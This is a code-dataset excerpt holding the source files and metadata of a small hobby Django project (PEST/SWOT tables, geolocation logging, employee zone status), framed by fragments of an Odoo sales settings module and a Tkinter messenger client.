default=False),\n use_inv_note=ICPSudo.get_param('sale.use_inv_note', default=False),\n 
auto_done_setting=ICPSudo.get_param('sale.auto_done_setting'),\n default_deposit_product_id=default_deposit_product_id,\n sale_show_tax=ICPSudo.get_param('sale.sale_show_tax', default='subtotal'),\n multi_sales_price=sale_pricelist_setting in ['percentage', 'formula'],\n multi_sales_price_method=sale_pricelist_setting in ['percentage', 'formula'] and sale_pricelist_setting or False,\n sale_pricelist_setting=sale_pricelist_setting,\n portal_confirmation=sale_portal_confirmation_options in ('pay', 'sign'),\n portal_confirmation_options=sale_portal_confirmation_options if sale_portal_confirmation_options in ('pay', 'sign') else False,\n )\n return res\n\t\n @api.multi\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n ICPSudo = self.env['ir.config_parameter'].sudo()\n ICPSudo.set_param('auth_signup.allow_uninvited', repr(self.auth_signup_uninvited == 'b2c'))\n ICPSudo.set_param(\"sale.use_sale_note\", self.use_sale_note)\n ICPSudo.set_param(\"sale.use_inv_note\", self.use_inv_note)\n ICPSudo.set_param(\"sale.auto_done_setting\", self.auto_done_setting)\n ICPSudo.set_param(\"sale.default_deposit_product_id\", self.default_deposit_product_id.id)\n ICPSudo.set_param('sale.sale_pricelist_setting', self.sale_pricelist_setting)\n ICPSudo.set_param('sale.sale_show_tax', self.sale_show_tax)\n ICPSudo.set_param('sale.sale_portal_confirmation_options', self.portal_confirmation_options if self.portal_confirmation_options in ('pay', 'sign') else 'none')\n\nclass AccountInvoice(models.Model):\n _inherit = 'account.invoice'\n\t\n def _default_comment(self):\n invoice_type = self.env.context.get('type', 'out_invoice')\n if invoice_type == 'out_invoice' and self.env['ir.config_parameter'].sudo().get_param('sale.use_inv_note'):\n return self.env.user.company_id.inv_note\n\n @api.onchange('partner_id', 'company_id')\n def _onchange_delivery_address(self):\n addr = self.partner_id.address_get(['delivery'])\n self.partner_shipping_id = addr and addr.get('delivery')\n if self.env.context.get('type', 'out_invoice') == 'out_invoice':\n company = self.company_id or self.env.user.company_id\n self.comment = company.with_context(lang=self.partner_id.lang).inv_note\n\n\t\t\t\n" } ]
3
haydane/django
https://github.com/haydane/django
e97c66fab1e23102bcf68abec7fae5fd87b94d29
b5db385a2c98065dd8eba87fde34d7d0c84133be
4d13ccd295b8e027d9d14655b01303132a022c40
refs/heads/main
2023-05-24T04:15:54.827447
2021-06-12T14:54:35
2021-06-12T14:54:35
374,910,441
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8229426145553589, "alphanum_fraction": 0.8229426145553589, "avg_line_length": 32.5, "blob_id": "a2d5fd45a404586c354f3f3a344f1706b27c0112", "content_id": "9672a0149af0f0157dadb13b707b7f6be314a235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 98, "num_lines": 12, "path": "/PestAndSwot/admin.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Politic, Economic, Social, Technology, Strength, Weakness, Opportunity, Thread\n\n# Register your models here.\nadmin.site.register(Politic)\nadmin.site.register(Economic)\nadmin.site.register(Social)\nadmin.site.register(Technology)\nadmin.site.register(Strength)\nadmin.site.register(Weakness)\nadmin.site.register(Opportunity)\nadmin.site.register(Thread)" }, { "alpha_fraction": 0.6471586227416992, "alphanum_fraction": 0.6471586227416992, "avg_line_length": 37.064517974853516, "blob_id": "b59a76747662b5f96082460b137f68550e4b1bbd", "content_id": "76f08ee557e294ab25f4fada929dcd1ffd85c1c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 98, "num_lines": 31, "path": "/PestAndSwot/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Politic, Economic, Social, Technology, Strength, Weakness, Opportunity, Thread\n\n# Create your views here.\ndef index(request):\n # pest\n politic_list = Politic.objects.all()\n economic_list = Economic.objects.all()\n social_list = Social.objects.all()\n technology_list = Technology.objects.all()\n #swot\n strength_list = Strength.objects.all()\n weakness_list = Weakness.objects.all()\n opportunity_list = Opportunity.objects.all()\n thread_list = Thread.objects.all()\n \n context = {\n 'politic_list':politic_list,\n 'economic_list':economic_list,\n 'social_list':social_list,\n 'technology_list':technology_list,\n 'strength_list':strength_list,\n 'weakness_list':weakness_list,\n 'opportunity_list':opportunity_list,\n 'thread_list':thread_list,\n }\n return render(request,'pestandswot/index.html',context)\n\ndef hello(request):\n return HttpResponse('<marquee behavior=\"scroll\" direction=\"right\">Hello World!</marquee>')" }, { "alpha_fraction": 0.7241379022598267, "alphanum_fraction": 0.7356321811676025, "avg_line_length": 42.66666793823242, "blob_id": "5c8c5975590841166ce0361a269f680175d27aa5", "content_id": "409f563368d4dd929023e07944522bf646efcc18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 91, "num_lines": 6, "path": "/edc/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass EdcData(models.Model):\n edc_value = models.DecimalField((\"EDC Value\"), max_digits=10, decimal_places=2)\n pub_date = models.DateTimeField((\"Published Date\"), auto_now=False, auto_now_add=False)" }, { "alpha_fraction": 0.6836460828781128, "alphanum_fraction": 0.7050938606262207, "avg_line_length": 40.55555725097656, "blob_id": "a05784bf85f654057080269d806009283b1c9c6c", "content_id": "91d79c357af061bd6d511436844d29ae857b692f", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 84, "num_lines": 9, "path": "/geo/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass GeoData(models.Model):\n device_name = models.TextField((\"Device Name\"), blank=True) \n latitude = models.DecimalField((\"Latitude\"), max_digits=20, decimal_places=15)\n longitude = models.DecimalField((\"Longitude\"), max_digits=20, decimal_places=15)\n def __str__(self):\n return self.device_name" }, { "alpha_fraction": 0.6750841736793518, "alphanum_fraction": 0.6851851940155029, "avg_line_length": 36.0625, "blob_id": "49168f0c35bedd051d24538054899966bf101051", "content_id": "76b4e686bac358efac98b6526d6bdf44f83f66ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 594, "license_type": "no_license", "max_line_length": 68, "num_lines": 16, "path": "/employee_status/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass ZoneCategory(models.Model):\n id = models.AutoField(primary_key=True, auto_created=True)\n name = models.CharField((\"Category Name\"),max_length=50)\n def __str__(self):\n return self.name\n\nclass EmpInfo(models.Model):\n id = models.AutoField(primary_key=True, auto_created=True)\n zone = models.ForeignKey(ZoneCategory, on_delete=models.CASCADE)\n emp_name = models.CharField((\"Full Name\"), max_length=50)\n emp_role = models.CharField((\"Role\"), max_length=50)\n def __str__(self):\n return self.emp_name\n\n" }, { "alpha_fraction": 0.5207824110984802, "alphanum_fraction": 0.5941320061683655, "avg_line_length": 21.72222137451172, "blob_id": "5b31138890996c293d5cc4c2036c644fce7f37ae", "content_id": "d518d7cd6aac716cfc27ca85905bd2aee01b2b1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 75, "num_lines": 18, "path": "/geo/migrations/0007_geodata_device_name.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-04-16 11:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('geo', '0006_auto_20210416_1030'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='geodata',\n name='device_name',\n field=models.TextField(blank=True, verbose_name='Device Name'),\n ),\n ]\n" }, { "alpha_fraction": 0.5325301289558411, "alphanum_fraction": 0.6048192977905273, "avg_line_length": 22.05555534362793, "blob_id": "ce2783c01378f520aa97934fd92e65d54f71f4e0", "content_id": "d76e3e3d4b416b4f703cbafed2eb51ba2c77953e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 415, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/PestAndSwot/migrations/0003_alter_politic_description.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 09:34\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0002_auto_20210514_0839'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='politic',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n ]\n" }, { "alpha_fraction": 0.7468030452728271, "alphanum_fraction": 
0.7468030452728271, "avg_line_length": 31.66666603088379, "blob_id": "f0cbe6856ec452aa037374d6a008e427b7ac29fd", "content_id": "3844e8bbd2928219e80ce2b38df2fa6e3f926ac5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 58, "num_lines": 12, "path": "/edc/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import EdcData\nfrom django.core import serializers\nimport json\n\n# Create your views here.\ndef index(request):\n edc_data_list = EdcData.objects.all()\n data_js = serializers.serialize('json', edc_data_list)\n context = {'edc_data_list': data_js}\n return render(request, 'edc/index.html', context)" }, { "alpha_fraction": 0.668749988079071, "alphanum_fraction": 0.668749988079071, "avg_line_length": 22, "blob_id": "2e0a0e5c5656b1b5b9a2abfcead659129ee713ba", "content_id": "d5b128b816e062f87391e072db8db96803668aa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/PestAndSwot/urls.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('pestandswot/', views.index, name='index'),\n path('', views.hello, name='hello')\n]" }, { "alpha_fraction": 0.8151260614395142, "alphanum_fraction": 0.8151260614395142, "avg_line_length": 23, "blob_id": "2dc15aaf357e9f635afe7dc6f2abdd1165c2cb8f", "content_id": "5ec5a4bddbcf9535d8c0c927d4e7d3a5a4edbc5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/geo/admin.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import GeoData\n\n# Register your models here.\nadmin.site.register(GeoData)" }, { "alpha_fraction": 0.5512650012969971, "alphanum_fraction": 0.5632489919662476, "avg_line_length": 30.29166603088379, "blob_id": "3d2852095fb1a5c80dc2d023a2f8199db6122899", "content_id": "607f6bebd180679fd5e4ebbb7fdc2399c35ee2fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1502, "license_type": "no_license", "max_line_length": 71, "num_lines": 48, "path": "/PestAndSwot/migrations/0004_auto_20210514_0935.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 09:35\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0003_alter_politic_description'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='economic',\n name='economics',\n field=models.TextField(blank=True, verbose_name='e'),\n ),\n migrations.AlterField(\n model_name='opportunity',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='social',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='strength',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='technology',\n name='description',\n field=models.TextField(blank=True, 
verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='thread',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='weakness',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n ]\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 29.219999313354492, "blob_id": "b600aa18b2f133c14af4feb94650e75dc0add5ed", "content_id": "698f94626ac3a85a9ab28566914ecb1678f866bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "no_license", "max_line_length": 56, "num_lines": 50, "path": "/PestAndSwot/models.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass Politic(models.Model):\n politics = models.TextField('p')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.politics\n\nclass Economic(models.Model):\n economics = models.TextField('e')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.economics\n\nclass Social(models.Model):\n socials = models.TextField('s')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.socials\n \nclass Technology(models.Model):\n technologies = models.TextField('t')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.technologies \n\nclass Strength(models.Model):\n strengths = models.TextField('s')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.strengths\n \nclass Weakness(models.Model):\n weaknesses = models.TextField('w')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.weaknesses\n \nclass Opportunity(models.Model):\n opportunities = models.TextField('o')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.opportunities\n \nclass Thread(models.Model):\n threads = models.TextField('t')\n description = models.TextField('remarks',blank=True)\n def __str__(self):\n return self.threads\n " }, { "alpha_fraction": 0.5976591110229492, "alphanum_fraction": 0.6020482778549194, "avg_line_length": 35, "blob_id": "afc9d9a7dbf67f5117839cfff6ef7573f033b96c", "content_id": "1ffb8602f95fff3a62b15bfe4a6c44a4fab11346", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1367, "license_type": "no_license", "max_line_length": 59, "num_lines": 38, "path": "/employee_status/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom .models import EmpInfo, ZoneCategory\n\n# Create your views here.\ndef index(request):\n yellow = EmpInfo.objects.filter(zone_id=1).count()\n dark_yellow = EmpInfo.objects.filter(zone_id=2).count()\n red = EmpInfo.objects.filter(zone_id=3).count()\n zone_list = ZoneCategory.objects.all()\n empInfo_list = EmpInfo.objects.all()\n\n context = { \"zone_list\": zone_list, \n \"empInfo_list\": empInfo_list,\n \"yellow\": yellow, \n \"dark_yellow\": dark_yellow, \n \"red\": red, \n }\n return render(request,'employees/index.html', context)\n\ndef updateZoneStatus(request):\n yellow = EmpInfo.objects.filter(zone_id=1).count()\n dark_yellow = EmpInfo.objects.filter(zone_id=2).count()\n red = EmpInfo.objects.filter(zone_id=3).count()\n zone_list = 
ZoneCategory.objects.all()\n empInfo_list = EmpInfo.objects.all()\n\n context = { \"zone_list\": zone_list, \n \"empInfo_list\": empInfo_list,\n \"yellow\": yellow, \n \"dark_yellow\": dark_yellow, \n \"red\": red, \n }\n\n zone_id = request.GET['zone_id']\n emp_id = request.GET['emp_id']\n EmpInfo.objects.filter(fk=zone_id).update(zone=zone_id)\n print(zone_id)\n return render(request,'employees/index.html',context)" }, { "alpha_fraction": 0.5320945978164673, "alphanum_fraction": 0.5439189076423645, "avg_line_length": 33.82352828979492, "blob_id": "e6c0a0aae716ead9c5ba37071a69c24386736f32", "content_id": "4df824a6d944daf73f01e76dc7d581ce43d1ee70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1184, "license_type": "no_license", "max_line_length": 117, "num_lines": 34, "path": "/PestAndSwot/migrations/0001_initial.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 08:27\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Pest',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('politics', models.TextField(verbose_name='p')),\n ('economics', models.TextField(verbose_name='e')),\n ('socials', models.TextField(verbose_name='s')),\n ('technologies', models.TextField(verbose_name='t')),\n ],\n ),\n migrations.CreateModel(\n name='Swot',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('strengths', models.TextField(verbose_name='s')),\n ('weaknesses', models.TextField(verbose_name='w')),\n ('opotunities', models.TextField(verbose_name='o')),\n ('threads', models.TextField(verbose_name='t')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.528273344039917, "alphanum_fraction": 0.5337163805961609, "avg_line_length": 38.8433723449707, "blob_id": "9a31727e3e92ce3ce484294a041e0d00557070d7", "content_id": "376118d184a48f122d6059c01d7800346dd31d07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "no_license", "max_line_length": 117, "num_lines": 83, "path": "/PestAndSwot/migrations/0002_auto_20210514_0839.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 08:39\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Economic',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('economics', models.TextField(verbose_name='e')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Opportunity',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('opportunities', models.TextField(verbose_name='o')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Politic',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('politics', models.TextField(verbose_name='p')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n 
migrations.CreateModel(\n name='Social',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('socials', models.TextField(verbose_name='s')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Strength',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('strengths', models.TextField(verbose_name='s')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Technology',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('technologies', models.TextField(verbose_name='t')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Thread',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('threads', models.TextField(verbose_name='t')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Weakness',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('weaknesses', models.TextField(verbose_name='w')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.DeleteModel(\n name='Pest',\n ),\n migrations.DeleteModel(\n name='Swot',\n ),\n ]\n" }, { "alpha_fraction": 0.6930894255638123, "alphanum_fraction": 0.6930894255638123, "avg_line_length": 36.92307662963867, "blob_id": "99830286545b48cf22dbf04c35677ef81b3fe6df", "content_id": "9a4f2c345ccf767ab50daadcebb0b49817e44957", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 88, "num_lines": 13, "path": "/geo/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom geo.models import GeoData\n# Create your views here.\n\ndef index(request):\n if(request.GET):\n # get data from AJAX in Javascript Function\n device_name = request.GET.get('device_name')\n latitude = request.GET.get('latitude')\n longitude = request.GET.get('longitude')\n geoData = GeoData(device_name=device_name,latitude=latitude,longitude=longitude)\n geoData.save()\n return render(request, 'geo/index.html')" }, { "alpha_fraction": 0.5268630981445312, "alphanum_fraction": 0.5788561701774597, "avg_line_length": 24.086956024169922, "blob_id": "c74a561982c4b4cc856a92790d56c88489fcf418", "content_id": "602b0cd17dbb23c16d4a8e1cc912e408c5f41764", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/PestAndSwot/migrations/0005_auto_20210516_0513.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-16 05:13\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0004_auto_20210514_0935'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='economic',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='economic',\n name='economics',\n field=models.TextField(verbose_name='e'),\n ),\n ]\n" }, { "alpha_fraction": 0.8403041958808899, 
"alphanum_fraction": 0.8403041958808899, "avg_line_length": 36.71428680419922, "blob_id": "fd833e820a11c1daa77aef39c8dc176a15c87592", "content_id": "aec367e061b54b133d6bd87b009c33b0b99ff431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/employee_status/admin.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.admin.decorators import register\nfrom django.contrib.admin.sites import site\nfrom .models import EmpInfo, ZoneCategory\n# Register your models here.\nadmin.site.register(ZoneCategory)\nadmin.site.register(EmpInfo)" } ]
18
maximilionus/VectorMessenger_Zero
https://github.com/maximilionus/VectorMessenger_Zero
d0bba26734413c2ee2a4b89d30b4a3146ad7443a
a024dcc8a178943d2bd7a37fe252ba0eec311148
0b4fc0288efb3a0a6f054b1ebbf00290fb5d992d
refs/heads/master
2022-12-19T06:12:33.618860
2020-08-17T01:07:27
2020-08-17T01:07:27
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5962596535682678, "alphanum_fraction": 0.6095342636108398, "avg_line_length": 42.70192337036133, "blob_id": "fe1cd6eb7296e88961275ca418f869193105bd56", "content_id": "0e375c65a13475574afba074fde1723a38a00b64", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13635, "license_type": "permissive", "max_line_length": 172, "num_lines": 312, "path": "/VectorMessenger/client.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport tkinter as tk\nfrom threading import Thread\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\nfrom VectorMessenger.MessengerCore.Helpers import Client as h_cl\nfrom VectorMessenger.MessengerCore.CoreClient import MessengerClient\nfrom VectorMessenger.MessengerCore.Encryption import VMCrypt\n\n\nclass VM_MainWindow:\n def __init__(self, root: object):\n def _on_close():\n self.messenger.stop_message_polling()\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', _on_close)\n\n self.root = root\n\n # Header Menu\n self.HM_Root = tk.Menu(root)\n root.configure(menu=self.HM_Root)\n self.HM_Theme = tk.Menu(self.HM_Root, tearoff=0)\n self.HM_Root.add_cascade(label='Theme', menu=self.HM_Theme)\n self.HM_Theme.add_command(label='Light', command=lambda: self.set_color_scheme(0))\n self.HM_Theme.add_command(label='Dark', command=lambda: self.set_color_scheme(1))\n self.HM_Advanced = tk.Menu(self.HM_Root, tearoff=0)\n self.HM_Root.add_cascade(label='Settings', command=self.show_window_settings)\n self.HM_Root.add_cascade(label='Advanced', menu=self.HM_Advanced)\n self.HM_Advanced.add_command(label='Debug Console', command=self.show_debug_console)\n\n # Top\n self.frame_top = tk.Frame(root)\n self.chat_messages = tk.Text(self.frame_top, width=48, height=26, wrap=tk.WORD, state=tk.DISABLED, font='Arial 13')\n self.chat_scroll = tk.Scrollbar(self.frame_top, command=self.chat_messages.yview)\n self.chat_messages.config(yscrollcommand=self.chat_scroll.set)\n\n self.frame_top.grid(column=0, row=0, sticky=\"NSEW\")\n self.chat_messages.grid(column=0, row=0, sticky=\"NSEW\")\n self.chat_scroll.grid(column=1, row=0, sticky=\"NS\")\n self.frame_top.columnconfigure(0, weight=1)\n self.frame_top.rowconfigure(0, weight=1)\n\n # Bottom\n self.frame_bot = tk.Frame(root)\n self.chat_message_input = tk.Entry(self.frame_bot, width=50)\n self.chat_message_input.bind('<Return>', self.send_message)\n self.chat_btn_send_message = tk.Button(self.frame_bot, text=\"\\u27A2\", font=20, relief=tk.FLAT, command=self.send_message)\n\n self.frame_bot.grid(column=0, row=1, sticky=\"NSEW\")\n self.chat_message_input.grid(column=0, row=0, sticky=\"NSEW\")\n self.chat_btn_send_message.grid(column=1, row=0, sticky=\"SE\")\n self.frame_bot.columnconfigure(0, weight=1)\n self.frame_bot.rowconfigure(0, weight=0)\n\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # Update checker\n if '--disable-updater' not in sys.argv:\n self.HM_Root.add_command(label='', state=tk.DISABLED)\n self.update_checker = h_cl.UpdateChecker(self.HM_Root)\n Thread(target=self.update_checker.check, daemon=True).start()\n\n def init_messenger(self):\n self.messenger = MessengerClient(self)\n self.messenger.register_user()\n\n def show_message(self, text: str):\n \"\"\" Will show the message in chat ui \"\"\"\n text = text + '\\n'\n\n self.chat_messages.config(state=tk.NORMAL)\n self.chat_messages.insert(tk.END, text)\n 
self.chat_messages.config(state=tk.DISABLED)\n self.chat_messages.see(tk.END)\n\n def send_message(self, *args):\n message = self.chat_message_input.get()\n self.chat_message_input.delete(0, tk.END)\n if len(message) > 0:\n self.messenger.send_message(message)\n\n def refresh_color_scheme(self, screen=0, refreshAll=False):\n \"\"\"\n Will refresh color theme from json config file\n\n Keyword Arguments:\n screen {int} -- Select screen to refresh colors. 0 - Root, 1 - Settings (default: {0})\n refreshAll {bool} -- Will refresh theme on all screens (default: {False})\n \"\"\"\n if refreshAll:\n for i in range(2):\n self.refresh_color_scheme(screen=i)\n return 0\n\n cfg = h.VMConfig.get(1)\n if len(cfg) > 0:\n theme_name = 'theme_' + cfg['ui']['theme_selected']\n selected_theme = cfg['ui']['root'][theme_name]\n if screen == 0:\n def _update_theme_from_dict(theme: dict):\n self.frame_top.config(bg=theme['frame_bg'])\n self.chat_messages.config(bg=theme['chat_bg'], fg=theme['text'])\n self.frame_bot.config(bg=theme['chat_bg'])\n self.chat_message_input.config(bg=theme['message_input_bg'], fg=theme['text'])\n self.chat_btn_send_message.config(bg=theme['buttond_send_bg'], fg=theme['buttond_send_fg'])\n\n # Font update\n self.chat_messages.config(font=cfg['ui']['root']['font'])\n self.chat_message_input.config(font=cfg['ui']['root']['font'])\n # Theme update\n _update_theme_from_dict(selected_theme)\n if screen == 1:\n pass # TODO: Implement theme refreshing for settings window\n\n if theme_name == 'theme_light':\n self.HM_Theme.entryconfig(0, state=tk.DISABLED)\n self.HM_Theme.entryconfig(1, state=tk.NORMAL)\n elif theme_name == 'theme_dark':\n self.HM_Theme.entryconfig(1, state=tk.DISABLED)\n self.HM_Theme.entryconfig(0, state=tk.NORMAL)\n else:\n h.create_log('Cant refresh color theme - config file was not found -> Building config from built-in values and trying again')\n h.VMConfig.init(1)\n self.refresh_color_scheme(screen, refreshAll)\n\n def set_color_scheme(self, mode: int):\n \"\"\"\n Set color scheme to selected mode\n\n Arguments:\n mode {int} -- Theme type (0 - light, 1 - dark)\n \"\"\"\n cfg = h.VMConfig.get(1)\n theme = 'light' if mode == 0 else 'dark'\n cfg['ui']['theme_selected'] = theme\n h.VMConfig.write(cfg, 1)\n h.create_log(f'UI Theme set to {theme}')\n self.refresh_color_scheme()\n\n def show_window_settings(self):\n \"\"\" Will show window with settings \"\"\"\n ENTRY_WIDTH = 40\n\n window = tk.Toplevel(self.root)\n h_cl.iconbitmap_universal(window)\n window.title('Settings')\n window.resizable(False, False)\n window = tk.Frame(window)\n window.grid(row=0, column=0, padx=5, pady=5)\n\n # Username settings\n def _reload_uname():\n uname_currentLabel.config(text='Current username: ' + h.VMConfig.get(1)['username'])\n\n def _setUname():\n username = uname_input.get()\n if len(username) > 0:\n cfg = h.VMConfig.get(1)\n cfg['username'] = username\n h.VMConfig.write(cfg, 1)\n _reload_uname()\n else:\n uname_input.delete(0, tk.END)\n uname_input.insert(0, \"Username can't be empty!\")\n\n frame_setUsername = tk.LabelFrame(window, text='Username')\n uname_currentLabel = tk.Label(frame_setUsername, text='')\n _reload_uname()\n uname_input = tk.Entry(frame_setUsername, width=ENTRY_WIDTH)\n uname_btn_set = tk.Button(frame_setUsername, text='Set', command=_setUname, height=1, relief=tk.FLAT, bg='#dfdfdf')\n\n frame_setUsername.grid(row=0, column=0, sticky='NSEW')\n uname_currentLabel.grid(row=0, column=0, sticky='W')\n uname_input.grid(row=1, column=0, sticky='W')\n 
